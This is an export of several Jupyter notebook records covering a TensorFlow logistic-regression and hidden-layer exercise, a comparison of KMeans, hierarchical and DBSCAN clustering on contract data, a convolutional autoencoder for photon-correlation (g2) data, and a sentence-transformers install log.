"batch_size = 128\n\ngraph = tf.Graph()\nwith graph.as_default():\n\n # Input data. For the training data, we use a placeholder that will be fed\n # at run time with a training minibatch.\n tf_train_dataset = tf.placeholder(tf.float32,\n shape=(batch_size, image_size * image_size))\n tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n \n # Variables.\n weights = tf.Variable(\n tf.truncated_normal([image_size * image_size, num_labels]))\n biases = tf.Variable(tf.zeros([num_labels]))\n \n # Training computation.\n logits = tf.matmul(tf_train_dataset, weights) + biases\n loss = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))\n \n # Optimizer.\n optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n \n # Predictions for the training, validation, and test data.\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(\n tf.matmul(tf_valid_dataset, weights) + biases)\n test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)",
"_____no_output_____"
]
],
[
[
"Let's run it:",
"_____no_output_____"
]
],
[
[
"num_steps = 3001\n\nwith tf.Session(graph=graph) as session:\n tf.global_variables_initializer().run()\n print(\"Initialized\")\n for step in range(num_steps):\n # Pick an offset within the training data, which has been randomized.\n # Note: we could use better randomization across epochs.\n offset = (step * batch_size) % (train_labels.shape[0] - batch_size)\n # Generate a minibatch.\n batch_data = train_dataset[offset:(offset + batch_size), :]\n batch_labels = train_labels[offset:(offset + batch_size), :]\n # Prepare a dictionary telling the session where to feed the minibatch.\n # The key of the dictionary is the placeholder node of the graph to be fed,\n # and the value is the numpy array to feed to it.\n feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}\n _, l, predictions = session.run(\n [optimizer, loss, train_prediction], feed_dict=feed_dict)\n if (step % 500 == 0):\n print(\"Minibatch loss at step %d: %f\" % (step, l))\n print(\"Minibatch accuracy: %.1f%%\" % accuracy(predictions, batch_labels))\n print(\"Validation accuracy: %.1f%%\" % accuracy(\n valid_prediction.eval(), valid_labels))\n print(\"Test accuracy: %.1f%%\" % accuracy(test_prediction.eval(), test_labels))",
"Initialized\nMinibatch loss at step 0 : 16.8091\nMinibatch accuracy: 12.5%\nValidation accuracy: 14.0%\nMinibatch loss at step 500 : 1.75256\nMinibatch accuracy: 77.3%\nValidation accuracy: 75.0%\nMinibatch loss at step 1000 : 1.32283\nMinibatch accuracy: 77.3%\nValidation accuracy: 76.6%\nMinibatch loss at step 1500 : 0.944533\nMinibatch accuracy: 83.6%\nValidation accuracy: 76.5%\nMinibatch loss at step 2000 : 1.03795\nMinibatch accuracy: 78.9%\nValidation accuracy: 77.8%\nMinibatch loss at step 2500 : 1.10219\nMinibatch accuracy: 80.5%\nValidation accuracy: 78.0%\nMinibatch loss at step 3000 : 0.758874\nMinibatch accuracy: 82.8%\nValidation accuracy: 78.8%\nTest accuracy: 86.1%\n"
]
],
[
[
"---\nProblem\n-------\n\nTurn the logistic regression example with SGD into a 1-hidden layer neural network with rectified linear units [nn.relu()](https://www.tensorflow.org/versions/r0.7/api_docs/python/nn.html#relu) and 1024 hidden nodes. This model should improve your validation / test accuracy.\n\n---",
"_____no_output_____"
]
]
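,
[
[
"# One possible solution sketch for the problem above: a 1-hidden-layer network with ReLU and 1024 hidden nodes.\n# It reuses batch_size, image_size, num_labels, the datasets and accuracy() defined earlier; the hyperparameters\n# are only a starting point, not a reference answer.\nnum_hidden = 1024\n\ngraph = tf.Graph()\nwith graph.as_default():\n\n  tf_train_dataset = tf.placeholder(tf.float32, shape=(batch_size, image_size * image_size))\n  tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))\n  tf_valid_dataset = tf.constant(valid_dataset)\n  tf_test_dataset = tf.constant(test_dataset)\n\n  # Hidden layer parameters.\n  weights_1 = tf.Variable(tf.truncated_normal([image_size * image_size, num_hidden]))\n  biases_1 = tf.Variable(tf.zeros([num_hidden]))\n  # Output layer parameters.\n  weights_2 = tf.Variable(tf.truncated_normal([num_hidden, num_labels]))\n  biases_2 = tf.Variable(tf.zeros([num_labels]))\n\n  # Training computation: affine -> ReLU -> affine, then softmax cross-entropy loss.\n  hidden = tf.nn.relu(tf.matmul(tf_train_dataset, weights_1) + biases_1)\n  logits = tf.matmul(hidden, weights_2) + biases_2\n  loss = tf.reduce_mean(\n    tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))\n\n  optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n\n  # Predictions for the training, validation, and test data.\n  train_prediction = tf.nn.softmax(logits)\n  valid_prediction = tf.nn.softmax(\n    tf.matmul(tf.nn.relu(tf.matmul(tf_valid_dataset, weights_1) + biases_1), weights_2) + biases_2)\n  test_prediction = tf.nn.softmax(\n    tf.matmul(tf.nn.relu(tf.matmul(tf_test_dataset, weights_1) + biases_1), weights_2) + biases_2)",
"_____no_output_____"
]
]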
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb04641ac66a27ea96aebeff0e074dcdac54522a | 270,390 | ipynb | Jupyter Notebook | ML/Clustering comparison Summarized Data.ipynb | georgetown-analytics/acquisitioners | acc7d4b3da71b6e08af67b1cf5f1731ea11a09c4 | [
"MIT"
] | null | null | null | ML/Clustering comparison Summarized Data.ipynb | georgetown-analytics/acquisitioners | acc7d4b3da71b6e08af67b1cf5f1731ea11a09c4 | [
"MIT"
] | null | null | null | ML/Clustering comparison Summarized Data.ipynb | georgetown-analytics/acquisitioners | acc7d4b3da71b6e08af67b1cf5f1731ea11a09c4 | [
"MIT"
] | null | null | null | 202.843211 | 37,256 | 0.893084 | [
[
[
"\n# CLUSTERING Comparisons\n \nClustering is a type of **Unsupervised Machine Learning**, which can determine relationships of unlabeled data. \n\nDBSCAN stands for Density-Based Spatial Clustering of Applications with Noise.\n\nThis notebook will show one approach to prepare data for exploration of DBScan, Agglomerative and KMeans. \nBased on [How DBSCAN Clustering Works](https://www.analyticsvidhya.com/blog/2020/09/how-dbscan-clustering-works/)\n\n### Data information\nTest DBScan over features\n- DBSCAN suffers from the curse of dimensionality.\n- This data has over 60 dimensions, so a few features will be modeled, not all of them at once.\n- Want to avoid false correlation like ice cream sales and drowning deaths, but still visualize groups and noise.",
"_____no_output_____"
],
[
"### Dependencies",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport csv\nimport os \nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import normalize\nfrom sklearn.decomposition import PCA\nimport seaborn as sns",
"_____no_output_____"
]
],
[
[
"### Preparing Data\nUse pandas to prepare data for machine learning.\n",
"_____no_output_____"
]
],
[
[
"#Reading in summarized feature set\n\nfile_name = os.path.join(os.getcwd(), \"summary_out_Text2.csv\")\n\ndf = pd.read_csv(file_name,skipinitialspace=True)",
"_____no_output_____"
]
],
[
[
"Look at the structure of the data.",
"_____no_output_____"
]
],
[
[
"df.head()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"df.shape",
"_____no_output_____"
]
],
[
[
"Select columns that will be used as features for Machine Learning.",
"_____no_output_____"
]
],
[
[
"#load two features\nx = df[['dollars_obligated','MaxTxYear']]\n",
"_____no_output_____"
]
],
[
[
"Dealing with missing values can be done by removing rows with missing data....",
"_____no_output_____"
]
],
[
[
"#check number of rows\nprint (\"original number of rows: %d\" % (len(x.index)))\n\n#see the nan rows\nx[x.isna().any(axis=1)]\n\n#remove rows\nx1 = x.dropna()\nprint (\"new number of rows: %d\" % (len(x1.index)))\n",
"original number of rows: 207714\nnew number of rows: 207714\n"
],
[
"## confirm that there are no null values\nx1.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 207714 entries, 0 to 207713\nData columns (total 2 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 dollars_obligated 207714 non-null float64\n 1 MaxTxYear 207714 non-null int64 \ndtypes: float64(1), int64(1)\nmemory usage: 3.2 MB\n"
]
],
[
[
"To see variance of features: boxplot (from Seaborn) can be used with the MinMaxscaler (from scikit-learn) to visualize this.",
"_____no_output_____"
]
],
[
[
"scaler = StandardScaler()\nX_scaled = scaler.fit_transform(x1)\n\nfmX = pd.DataFrame(X_scaled)\n\nax = sns.boxplot(data=fmX)\nax",
"_____no_output_____"
],
[
"#look at the box plot of the unscaled data\nax = sns.boxplot(data=x1)",
"_____no_output_____"
],
[
"#scatter plot the first 2 columns\nplt.figure(figsize=(10,10))\nplt.scatter(fmX[0],fmX[1],s=15,color='grey')\nplt.title('Dataset',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means=KMeans(n_clusters=4,random_state=42)\nk_means.fit(fmX[[0,1]])\nfmX['KMeans_labels']=k_means.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10,10))\nplt.scatter(fmX[0],fmX[1],c=fmX['KMeans_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled Data',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"# Normalizing the data so that \n# the data approximately follows a Gaussian distribution\nX_normalized = normalize(X_scaled)\n \n# Converting the numpy array into a pandas DataFrame\ndf_X_normalized = pd.DataFrame(X_normalized)",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means_norm=KMeans(n_clusters=4,random_state=42)\nk_means_norm.fit(df_X_normalized[[0,1]])\ndf_X_normalized['KMeans_labels']=k_means_norm.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10, 10))\nplt.scatter(df_X_normalized[0],df_X_normalized[1],c=df_X_normalized['KMeans_labels']\n ,cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled and Normalized Features',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()\n",
"_____no_output_____"
],
[
"#picking a subset of data\ndf_X_normalized.describe()",
"_____no_output_____"
],
[
"df_samp = df_X_normalized.sample(frac = 0.10)",
"_____no_output_____"
],
[
"df_samp.describe()",
"_____no_output_____"
],
[
"df_samp.shape",
"_____no_output_____"
],
[
"#Look at agglomerative - selected a very small sample since memory error\n#running this took 80% of memory -any more pings my pc\nfrom sklearn.cluster import AgglomerativeClustering\nmodel = AgglomerativeClustering(n_clusters=4, affinity='euclidean')\nmodel.fit(df_samp[[0,1]])\ndf_samp['HR_labels']=model.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\nplt.figure(figsize=(10,10))\nplt.scatter(df_samp[0],df_samp[1],c=df_samp['HR_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('Hierarchical Clustering',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#finally DBScan, though both heirarchical and KMeans did pretty well\nfrom sklearn.cluster import DBSCAN\ndbscan=DBSCAN()\ndbscan.fit(df_samp[[0,1]])\ndf_samp['DBSCAN_labels']=dbscan.labels_",
"_____no_output_____"
],
[
"df_samp.shape",
"_____no_output_____"
],
[
"# Plotting resulting clusters\nplt.figure(figsize=(10,10))\nplt.scatter(df_samp[0],df_samp[1],c=df_samp['DBSCAN_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('DBSCAN Clustering',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
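[
"# DBSCAN above ran with default eps and min_samples; a common way to pick eps is a k-distance plot.\n# Sketch only: it assumes df_samp (the 10% sample with columns 0 and 1) from the cells above.\nfrom sklearn.neighbors import NearestNeighbors\n\nneighbors = NearestNeighbors(n_neighbors=5)\nneighbors_fit = neighbors.fit(df_samp[[0,1]])\ndistances, indices = neighbors_fit.kneighbors(df_samp[[0,1]])\n\n# sort the distance to the 5th nearest neighbour and look for the 'elbow' as a candidate eps\ndistances = np.sort(distances[:, -1])\nplt.figure(figsize=(10,5))\nplt.plot(distances)\nplt.title('k-distance plot for choosing eps',fontsize=20)\nplt.xlabel('Points sorted by distance',fontsize=14)\nplt.ylabel('Distance to 5th nearest neighbour',fontsize=14)\nplt.show()",
"_____no_output_____"
],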
[
"#try with other data that has been one hot encoded\ndf_fs=df[['naics_code','level_3_cat_platform']]",
"_____no_output_____"
],
[
"#remove nulls\ndf_fs1 =df_fs.dropna()",
"_____no_output_____"
],
[
"#scale the new data and plot\nscaler = StandardScaler()\ndf_fs_scaled = scaler.fit_transform(df_fs1)\n\ndf_scaled = pd.DataFrame(df_fs_scaled)\n\nax = sns.boxplot(data=df_scaled)\nax",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means=KMeans(n_clusters=4,random_state=42)\nk_means.fit(df_scaled[[0,1]])\ndf_scaled['KMeans_labels']=k_means.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10,10))\nplt.scatter(df_scaled[0],df_scaled[1],c=df_scaled['KMeans_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled Data',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"# Normalizing the data so that \n# the data approximately follows a Gaussian distribution\ndf_norm = normalize(df_scaled)\n \n# Converting the numpy array into a pandas DataFrame\ndf_norm = pd.DataFrame(df_norm)",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means_norm=KMeans(n_clusters=4,random_state=42)\nk_means_norm.fit(df_norm[[0,1]])\ndf_norm['KMeans_labels']=k_means_norm.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10, 10))\nplt.scatter(df_norm[0],df_norm[1],c=df_norm['KMeans_labels']\n ,cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled and Normalized Features',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#try dbscan on these two\ndf_samp2 = df_norm.sample(frac = 0.05)",
"_____no_output_____"
],
[
"print(df_samp2.shape, df.shape)",
"(10386, 4) (207714, 61)\n"
],
[
"df_samp2.head()",
"_____no_output_____"
],
[
"dbscan.fit(df_samp2[[0,1]])\ndf_samp2['DBSCAN_labels']=dbscan.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\nplt.figure(figsize=(10,10))\nplt.scatter(df_samp2[0],df_samp2[1],c=df_samp2['DBSCAN_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('DBSCAN Clustering',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#conclusion DBScan works much better on the summarized data than the unsummarized",
"_____no_output_____"
]
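,
[
"# To put numbers on the visual comparison, silhouette scores could be computed for each labelling.\n# Sketch only: it assumes the label columns created above are still present in fmX and df_samp.\nfrom sklearn.metrics import silhouette_score\n\nfor name, frame, labels in [\n    ('KMeans (scaled)', fmX[[0,1]], fmX['KMeans_labels']),\n    ('Hierarchical (sample)', df_samp[[0,1]], df_samp['HR_labels']),\n    ('DBSCAN (sample)', df_samp[[0,1]], df_samp['DBSCAN_labels'])]:\n    # silhouette_score needs at least 2 clusters; DBSCAN can return a single cluster plus noise\n    if len(set(labels)) > 1:\n        print(name, silhouette_score(frame, labels, sample_size=10000, random_state=42))\n    else:\n        print(name, 'only one cluster found, silhouette undefined')",
"_____no_output_____"
]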
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb04661bd5b522b13b8dd8029c0a7aed974e6f26 | 150,233 | ipynb | Jupyter Notebook | midterm.ipynb | ubsuny/g2-coral | 2de9f2190ff51714bbcd83b74cc123ee36a0536f | [
"MIT"
] | null | null | null | midterm.ipynb | ubsuny/g2-coral | 2de9f2190ff51714bbcd83b74cc123ee36a0536f | [
"MIT"
] | 26 | 2021-03-28T20:52:44.000Z | 2021-05-14T22:01:05.000Z | midterm.ipynb | ubsuny/g2-coral | 2de9f2190ff51714bbcd83b74cc123ee36a0536f | [
"MIT"
] | 1 | 2021-05-19T02:59:51.000Z | 2021-05-19T02:59:51.000Z | 355.160757 | 42,916 | 0.928378 | [
[
[
"Since g2 data from measurements are saved in .spe files so we import an external library to read such files to get data in numpy arrays.",
"_____no_output_____"
]
],
[
[
"# import libraries we need\n%pylab inline\nimport sys\nsys.path.append('./py_programs/')\nfrom tensorflow import keras\nfrom sdt_reader import sdtfile\nfrom py_programs import sdt",
"Populating the interactive namespace from numpy and matplotlib\n"
],
[
"file = sdtfile.SdtFile('./sdt_data/Antibunching_Rh110_DPC.sdt')",
"_____no_output_____"
],
[
"file.block_measure_info",
"_____no_output_____"
],
[
"# read data files\nt1, y1 = sdt.read('./sdt_data/Antibunching_Rh110_DPC.sdt')\nt2, y2 = sdt.read('./sdt_data/Antibunching_Rh110_Spc.sdt')",
"_____no_output_____"
],
[
"# cut off the first and last few zero data points\ny2 = y2[np.argwhere(y2>0)].flatten()\nt2 = t2[np.argwhere(y2>0)].flatten()",
"_____no_output_____"
]
],
[
[
"We need to manually set the dip as the zero time delay. And also normalize the g2 signal to its maximum.",
"_____no_output_____"
]
],
[
[
"# normalize g2 values and zero the time delay\nt1_norm, y1_norm = sdt.normalize(t1,y1)\nt2_norm, y2_norm = sdt.normalize(t2,y2)",
"_____no_output_____"
],
[
"# take a look at the data\nplt.figure(1)\n\nplt.title('Antibunching_Rh110_DPC')\nplt.xlabel(r'$\\tau$(ns)')\nplt.ylabel(r'$g^{(2)}$') # un-normalized\nplt.plot(t1_norm,y1_norm)\n\nplt.figure(2)\n\nplt.title('Antibunching_Rh110_Spc')\nplt.xlabel(r'$\\tau$(ns)')\nplt.ylabel(r'$g^{(2)}$')\nplt.plot(t2_norm,y2_norm)\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"# MachineLearning Part",
"_____no_output_____"
],
[
"To avoid tensorflow occupying all CPUs or GPU in a computer we need to set processing units which tensorflow has access to use.",
"_____no_output_____"
]
],
[
[
"# this is to limit the GPU and CPUs being occupied by tensorflow\nfrom implementations import tf_setCPU",
"_____no_output_____"
],
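[
"# The helper above is project-specific; with plain TensorFlow 2.x the same idea looks roughly like the\n# sketch below (limits the visible GPU and the number of CPU threads; the values are arbitrary examples).\nimport tensorflow as tf\n\ngpus = tf.config.list_physical_devices('GPU')\nif gpus:\n    # keep only the first GPU visible and let its memory grow on demand\n    tf.config.set_visible_devices(gpus[0], 'GPU')\n    tf.config.experimental.set_memory_growth(gpus[0], True)\n\n# limit the number of CPU threads TensorFlow may use\ntf.config.threading.set_intra_op_parallelism_threads(2)\ntf.config.threading.set_inter_op_parallelism_threads(2)",
"_____no_output_____"
],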
[
"# create training sequences\n#time_step = 2\ntrain = sdt.create_train(y1_norm,time_step)\n#train2x, train2y = sdt.create_train(y1,time_step\ntrain1 = train1.reshape(train1.shape[0],train1.shape[1],1)\ntrain2 = sdt.create_train(y2_norm,time_step)\ntrain2 = train2.reshape(train2.shape[0],train2.shape[1],1)",
"_____no_output_____"
]
],
[
[
"Here I create a [1D CNN](https://keras.io/api/layers/convolution_layers/convolution1d/).",
"_____no_output_____"
]
],
[
[
"# create a training model\nkernelsize = 7\nmodel = keras.Sequential()\nmodel.add(keras.layers.Input(shape=(train1.shape[1],train1.shape[2])))\nmodel.add(keras.layers.Conv1D(filters=32, kernel_size=kernelsize, padding=\"same\", strides=1, activation=\"relu\")) #,input_shape=(train1.shape[0],train1.shape[1],1)\nmodel.add(keras.layers.Dropout(rate=0.1))\nmodel.add(keras.layers.Conv1D(filters=16, kernel_size=kernelsize, padding=\"same\", strides=1, activation=\"relu\")) #,input_shape=(train1.shape[0],train1.shape[1],1)\nmodel.add(keras.layers.Conv1DTranspose(filters=16, kernel_size=kernelsize,activation=\"relu\", padding=\"same\"))\nmodel.add(keras.layers.Dropout(rate=0.1))\nmodel.add(keras.layers.Conv1DTranspose(filters=32, kernel_size=kernelsize,activation=\"relu\", padding=\"same\"))\nmodel.add(keras.layers.Conv1DTranspose(filters=1, kernel_size=kernelsize, padding=\"same\"))\nmodel.compile(optimizer=keras.optimizers.Adam(learning_rate=0.001), loss=\"mse\")\nmodel.summary()",
"Model: \"sequential_1\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv1d_2 (Conv1D) (None, 2, 32) 256 \n_________________________________________________________________\ndropout_2 (Dropout) (None, 2, 32) 0 \n_________________________________________________________________\nconv1d_3 (Conv1D) (None, 2, 16) 3600 \n_________________________________________________________________\nconv1d_transpose_3 (Conv1DTr (None, 2, 16) 1808 \n_________________________________________________________________\ndropout_3 (Dropout) (None, 2, 16) 0 \n_________________________________________________________________\nconv1d_transpose_4 (Conv1DTr (None, 2, 32) 3616 \n_________________________________________________________________\nconv1d_transpose_5 (Conv1DTr (None, 2, 1) 225 \n=================================================================\nTotal params: 9,505\nTrainable params: 9,505\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"# training ...\nhistory = model.fit(train2,train2,epochs=20,validation_split=.1)",
"Epoch 1/20\n105/105 [==============================] - 0s 2ms/step - loss: 0.5484 - val_loss: 0.0234\nEpoch 2/20\n105/105 [==============================] - 0s 746us/step - loss: 0.0258 - val_loss: 0.0166\nEpoch 3/20\n105/105 [==============================] - 0s 727us/step - loss: 0.0157 - val_loss: 0.0022\nEpoch 4/20\n105/105 [==============================] - 0s 737us/step - loss: 0.0084 - val_loss: 0.0012\nEpoch 5/20\n105/105 [==============================] - 0s 730us/step - loss: 0.0073 - val_loss: 9.9977e-04\nEpoch 6/20\n105/105 [==============================] - 0s 751us/step - loss: 0.0063 - val_loss: 0.0012\nEpoch 7/20\n105/105 [==============================] - 0s 754us/step - loss: 0.0050 - val_loss: 0.0025\nEpoch 8/20\n105/105 [==============================] - 0s 756us/step - loss: 0.0044 - val_loss: 0.0016\nEpoch 9/20\n105/105 [==============================] - 0s 733us/step - loss: 0.0040 - val_loss: 0.0027\nEpoch 10/20\n105/105 [==============================] - 0s 691us/step - loss: 0.0034 - val_loss: 0.0020\nEpoch 11/20\n105/105 [==============================] - 0s 688us/step - loss: 0.0033 - val_loss: 0.0029\nEpoch 12/20\n105/105 [==============================] - 0s 690us/step - loss: 0.0029 - val_loss: 0.0017\nEpoch 13/20\n105/105 [==============================] - 0s 677us/step - loss: 0.0029 - val_loss: 0.0041\nEpoch 14/20\n105/105 [==============================] - 0s 722us/step - loss: 0.0028 - val_loss: 0.0023\nEpoch 15/20\n105/105 [==============================] - 0s 725us/step - loss: 0.0024 - val_loss: 0.0049\nEpoch 16/20\n105/105 [==============================] - 0s 724us/step - loss: 0.0022 - val_loss: 0.0022\nEpoch 17/20\n105/105 [==============================] - 0s 690us/step - loss: 0.0021 - val_loss: 0.0022\nEpoch 18/20\n105/105 [==============================] - 0s 691us/step - loss: 0.0021 - val_loss: 0.0036\nEpoch 19/20\n105/105 [==============================] - 0s 685us/step - loss: 0.0018 - val_loss: 0.0026\nEpoch 20/20\n105/105 [==============================] - 0s 687us/step - loss: 0.0017 - val_loss: 0.0033\n"
],
[
"plt.plot(history.history[\"loss\"], label=\"Training Loss\")\nplt.plot(history.history[\"val_loss\"], label=\"Validation Loss\")\nplt.legend()\nplt.show()",
"_____no_output_____"
],
[
"# use the model to predict data\npred1 = model.predict(train1)\npred2 = model.predict(train2)",
"_____no_output_____"
],
[
"# plot prediction\nplt.figure(1)\nplt.plot(t1_norm[:-2],pred1[:,1,0],label='predict')\nplt.plot(t1_norm[:-2],train1[:,0],'.',markersize=4,label='original')\nplt.legend(loc=(0.01,0.01))\n\nplt.figure(2)\nplt.plot(t2_norm[:-2],pred2[:,0,0],label='predict')\nplt.plot(t2_norm[:-2],train2[:,0],'.',markersize=4,label='original')\nplt.legend(loc=(0.01,0.01))\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb047b4a98b89b429484ffbb51f65379b8858d96 | 46,380 | ipynb | Jupyter Notebook | QuoraSentenceSimilarity.ipynb | subham1/sentence-transformers | f4e2009a86027b19a66721811e48aa1c3b5e295e | [
"Apache-2.0"
] | null | null | null | QuoraSentenceSimilarity.ipynb | subham1/sentence-transformers | f4e2009a86027b19a66721811e48aa1c3b5e295e | [
"Apache-2.0"
] | null | null | null | QuoraSentenceSimilarity.ipynb | subham1/sentence-transformers | f4e2009a86027b19a66721811e48aa1c3b5e295e | [
"Apache-2.0"
] | null | null | null | 39.47234 | 3,523 | 0.487602 | [
[
[
"<a href=\"https://colab.research.google.com/github/subham1/sentence-transformers/blob/master/QuoraSentenceSimilarity.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!pip install sentence_transformers ",
"Collecting sentence_transformers\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/c9/91/c85ddef872d5bb39949386930c1f834ac382e145fcd30155b09d6fb65c5a/sentence-transformers-0.2.5.tar.gz (49kB)\n\u001b[K |████████████████████████████████| 51kB 2.7MB/s \n\u001b[?25hCollecting transformers==2.3.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/50/10/aeefced99c8a59d828a92cc11d213e2743212d3641c87c82d61b035a7d5c/transformers-2.3.0-py3-none-any.whl (447kB)\n\u001b[K |████████████████████████████████| 450kB 13.5MB/s \n\u001b[?25hRequirement already satisfied: tqdm in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (4.28.1)\nRequirement already satisfied: torch>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (1.4.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (1.17.5)\nRequirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (0.22.1)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (1.4.1)\nRequirement already satisfied: nltk in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (3.2.5)\nRequirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (2019.12.20)\nRequirement already satisfied: sentencepiece in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (0.1.85)\nRequirement already satisfied: sacremoses in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (0.0.38)\nRequirement already satisfied: boto3 in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (1.11.10)\nRequirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (2.21.0)\nRequirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->sentence_transformers) (0.14.1)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from nltk->sentence_transformers) (1.12.0)\nRequirement already satisfied: click in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers==2.3.0->sentence_transformers) (7.0)\nRequirement already satisfied: botocore<1.15.0,>=1.14.10 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers==2.3.0->sentence_transformers) (1.14.10)\nRequirement already satisfied: s3transfer<0.4.0,>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers==2.3.0->sentence_transformers) (0.3.2)\nRequirement already satisfied: jmespath<1.0.0,>=0.7.1 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers==2.3.0->sentence_transformers) (0.9.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) (2019.11.28)\nRequirement already satisfied: urllib3<1.25,>=1.21.1 